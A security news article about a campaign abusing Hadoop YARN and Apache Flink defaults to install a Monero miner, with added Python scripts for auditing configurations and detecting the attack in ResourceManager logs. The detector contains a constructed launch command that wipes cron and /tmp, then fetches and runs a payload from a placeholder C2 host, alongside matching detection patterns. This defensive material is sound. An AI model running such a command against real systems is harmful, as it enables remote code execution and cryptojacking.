Attacker Targets Hadoop YARN, Flink Servers in Stealthy Campaign

Published: 23/11/2024   Category: security




The adversary is exploiting two known misconfigurations in the big data technologies to drop a Monero cryptominer.



A threat actor is targeting a common misconfiguration in Hadoop YARN and Apache Flink to try and drop Monero cryptominers in environments running the two big data technologies.
What makes the campaign especially notable is the adversary's use of sophisticated evasion techniques, such as rootkits, packed ELF binaries, directory content deletion, and system configuration modifications to bypass typical threat detection mechanisms.
Researchers from Aqua Nautilus uncovered the campaign when they spotted new attacks hitting one of their cloud honeypots recently. One attack exploited a known misconfiguration in a feature in Hadoop YARN called ResourceManager that manages resources for applications running on a Hadoop cluster. The other targeted a similarly known misconfiguration in Flink that, like the YARN issue, gives attackers a way to run arbitrary code on affected systems.
Hadoop YARN (Yet Another Resource Negotiator) is a resource management subsystem of the Hadoop ecosystem for big data processing. Apache Flink is a relatively widely used open source stream and batch processor for event-driven data analytics and data pipeline applications.
Assaf Morag, lead researcher for Aqua Nautilus, says the YARN misconfiguration gives attackers a way to send an unauthenticated API request to create new applications. The Flink misconfiguration allows an attacker to upload a Java archive (JAR) file that contains malicious code to a Flink server.
"Both misconfigurations permit remote code execution, implying that an attacker could potentially gain complete control over the server," Morag says. "Given that these servers are used for data processing, their misconfigurations present a data exfiltration risk. Furthermore, these servers are typically interconnected with other servers within the organization, which could facilitate lateral movement by the attacker," Morag says.
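The two "misconfigurations" above are, in practice, default settings left in place: Hadoop ships with `hadoop.security.authentication` set to `simple` (any HTTP client can claim a username and the ResourceManager REST API will accept its application submission) and `yarn.acl.enable` off, while Flink ships with `web.submit.enable` on, so the REST port accepts JAR uploads from anyone who can reach it. The following audit script is an added example, not Aqua's tooling or anything from the Hadoop or Flink projects; it parses the text of `core-site.xml`/`yarn-site.xml` and `flink-conf.yaml` and reports the weak settings next to what a hardened file looks like. The sample configuration files are constructed.

```python
"""Audit Hadoop YARN and Flink configuration for the two exposure classes above.

Added example (not Aqua Nautilus tooling). The sample files below are constructed.
"""
import xml.etree.ElementTree as ET


def parse_hadoop_xml(text: str) -> dict:
    """Return {name: value} from a Hadoop-style <configuration> file."""
    props = {}
    for prop in ET.fromstring(text).findall("property"):
        name = prop.findtext("name")
        if name is not None:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def parse_flink_conf(text: str) -> dict:
    """Return {key: value} from the flat 'key: value' lines of flink-conf.yaml."""
    props = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if ":" in line:
            key, _, value = line.partition(":")
            props[key.strip()] = value.strip()
    return props


def audit_yarn(props: dict) -> list:
    """Findings for the merged core-site.xml + yarn-site.xml properties."""
    findings = []
    # Default is 'simple' auth, which trusts any claimed username, so the
    # ResourceManager REST API creates and launches applications for anyone.
    if props.get("hadoop.security.authentication", "simple").lower() != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos: "
                        "ResourceManager REST API accepts unauthenticated application submission")
    # ACLs are off by default, so queue/admin ACLs are never enforced.
    if props.get("yarn.acl.enable", "false").lower() != "true":
        findings.append("yarn.acl.enable is false: queue and admin ACLs are not enforced")
    return findings


def audit_flink(props: dict) -> list:
    """Findings for flink-conf.yaml; JAR upload via the web UI/REST is on by default."""
    findings = []
    if props.get("web.submit.enable", "true").lower() == "true":
        findings.append("web.submit.enable is true: any client reaching the REST port "
                        "can upload and run a JAR")
    return findings


# Constructed weak configuration: stock defaults, nothing tightened.
WEAK_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn.example.internal:8020</value></property>
</configuration>
"""
WEAK_YARN_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.resourcemanager.hostname</name><value>rm.example.internal</value></property>
</configuration>
"""
WEAK_FLINK_CONF = "jobmanager.rpc.address: jm.example.internal\nrest.port: 8081\n"

# Constructed hardened configuration: Kerberos on, ACLs on, web JAR upload off.
HARDENED_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
</configuration>
"""
HARDENED_YARN_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>yarn</value></property>
</configuration>
"""
HARDENED_FLINK_CONF = "jobmanager.rpc.address: jm.example.internal\nweb.submit.enable: false  # no JAR upload via REST\n"


def run_audit(core_xml: str, yarn_xml: str, flink_yaml: str) -> list:
    """Merge the Hadoop files and return every finding for the deployment."""
    hadoop = {**parse_hadoop_xml(core_xml), **parse_hadoop_xml(yarn_xml)}
    return audit_yarn(hadoop) + audit_flink(parse_flink_conf(flink_yaml))


if __name__ == "__main__":
    for label, files in (("weak", (WEAK_CORE_SITE, WEAK_YARN_SITE, WEAK_FLINK_CONF)),
                         ("hardened", (HARDENED_CORE_SITE, HARDENED_YARN_SITE, HARDENED_FLINK_CONF))):
        print(label, run_audit(*files) or ["no findings"])
```

Enabling Kerberos and ACLs changes how every client talks to the cluster, so the audit is meant to be run against the real files before a change window rather than to rewrite them; on the weak sample it reports all three findings, on the hardened sample none.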
In the attack on Aqua Nautilus' honeypots, the adversary exploited the misconfiguration in Hadoop YARN to send an unauthenticated request to deploy a new application. The attacker was then able to execute remote code on the misconfigured YARN by sending a POST request, asking it to launch the new application using the attacker's command. To establish persistence, the attacker first deleted all cron jobs — or scheduled tasks — on the YARN server and created a new cron job.
Aqua's analysis of the attack chain showed the attacker using the command to delete the content of the /tmp directory on the YARN server, downloading a malicious file to the /tmp directory from a remote command-and-control server, executing the file, and then again deleting the contents of the directory. Aqua researchers found the secondary payload from the C2 server to be a packed ELF (Executable and Linkable Format) binary that served as a downloader for two different rootkits, one of which was a Monero cryptocurrency miner. Malware detection engines on VirusTotal did not detect the secondary ELF binary payload, Aqua said.
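Because the payload itself evaded VirusTotal, the more reliable signals are the two steps that precede it: the unauthenticated application submission and the launch command that wipes cron and stages a file in /tmp. The detection logic below is an added example, not Aqua Nautilus code. It parses ResourceManager audit-log lines (the tab-separated `KEY=VALUE` format written by Hadoop's `RMAuditLogger`) and flags submissions made as `dr.who`, the static username Hadoop assigns to HTTP clients when authentication is `simple`, or from outside an assumed trusted submitter network; it then scores container launch commands against the chain the article describes. All log lines, IP ranges and commands are constructed; the C2 host is a placeholder.

```python
"""Detect the YARN attack chain described above from RM audit logs and launch commands.

Added example, not Aqua Nautilus code. Every log line and command is constructed.
"""
import ipaddress
import re

UNAUTH_STATIC_USER = "dr.who"  # default of hadoop.http.staticuser.user
# Assumed trusted range for job submitters on this hypothetical cluster.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed ResourceManager audit lines (RMAuditLogger format).
RM_AUDIT_LINES = [
    "2024-11-20 10:01:02,117 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: "
    "USER=etl\tIP=10.20.4.9\tOPERATION=Submit Application Request\tTARGET=ClientRMService"
    "\tRESULT=SUCCESS\tAPPID=application_1732000000000_0007",
    "2024-11-20 10:03:44,902 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: "
    "USER=dr.who\tIP=203.0.113.77\tOPERATION=Submit Application Request\tTARGET=ClientRMService"
    "\tRESULT=SUCCESS\tAPPID=application_1732000000000_0008",
    "2024-11-20 10:03:45,010 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: "
    "USER=dr.who\tIP=203.0.113.77\tOPERATION=Kill Application Request\tTARGET=ClientRMService"
    "\tRESULT=SUCCESS\tAPPID=application_1732000000000_0008",
]


def parse_rm_audit(line: str):
    """Return the KEY=VALUE fields after 'RMAuditLogger: ', or None for other lines."""
    _, sep, rest = line.partition("RMAuditLogger: ")
    if not sep:
        return None
    fields = {}
    for field in rest.split("\t"):
        key, _, value = field.partition("=")
        fields[key] = value
    return fields


def flag_submissions(lines) -> list:
    """Return (appid, reason) for suspicious 'Submit Application Request' events."""
    hits = []
    for line in lines:
        f = parse_rm_audit(line)
        if not f or f.get("OPERATION") != "Submit Application Request":
            continue
        reasons = []
        if f.get("USER") == UNAUTH_STATIC_USER:
            reasons.append("submitted by static unauthenticated user")
        try:
            ip = ipaddress.ip_address(f.get("IP", ""))
            if not any(ip in net for net in TRUSTED_NETS):
                reasons.append("source %s outside trusted submitter networks" % ip)
        except ValueError:
            reasons.append("unparseable source IP")
        if reasons:
            hits.append((f.get("APPID"), "; ".join(reasons)))
    return hits


# Stages of the chain in the article: cron wiped, /tmp cleared, payload fetched
# into /tmp, executed from /tmp. Each pattern is one stage.
CHAIN_PATTERNS = [
    ("cron wiped", re.compile(r"\bcrontab\s+-r\b")),
    ("/tmp cleared", re.compile(r"\brm\s+-rf?\s+/tmp(/\*)?(\s|;|$)")),
    ("download to /tmp", re.compile(r"\b(curl|wget)\b[^;&|]*\s/tmp/")),
    ("exec from /tmp", re.compile(r"(^|[;&|]\s*)(/tmp/\S+|(sh|bash)\s+/tmp/\S+)")),
]


def score_command(cmd: str) -> list:
    """Return the names of the chain stages a launch command matches, in order."""
    return [name for name, pat in CHAIN_PATTERNS if pat.search(cmd)]


# Constructed launch commands: one ordinary job, one matching the full chain.
LAUNCH_COMMANDS = [
    "/usr/bin/spark-submit --class app.Etl /opt/jobs/etl.jar",
    "crontab -r; rm -rf /tmp/*; curl -fsSL http://c2.placeholder.invalid/s -o /tmp/s; "
    "chmod +x /tmp/s; /tmp/s; rm -rf /tmp/*",
]


if __name__ == "__main__":
    for appid, reason in flag_submissions(RM_AUDIT_LINES):
        print("ALERT submission", appid, "-", reason)
    for cmd in LAUNCH_COMMANDS:
        stages = score_command(cmd)
        if len(stages) >= 2:
            print("ALERT launch command matches stages:", ", ".join(stages))
```

Alerting on two or more matched stages rather than one keeps ordinary jobs that merely write scratch files under /tmp out of the alert queue, while the `dr.who` check fires on the first unauthenticated submission regardless of what the command looks like.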
"As these servers are designed for processing big data, they possess high CPU capabilities," Morag says. "The attacker is exploiting this fact to run cryptominers, which also require a substantial amount of CPU resources."
Morag says the attack is noteworthy for the different techniques the attacker used to conceal their malicious activity. These included the use of a packer to obfuscate the ELF binary, the use of stripped payloads to make analysis more challenging, an embedded payload within the ELF binary, file and directory permissions modifications, and the use of two rootkits to hide the cryptominer and shell commands.
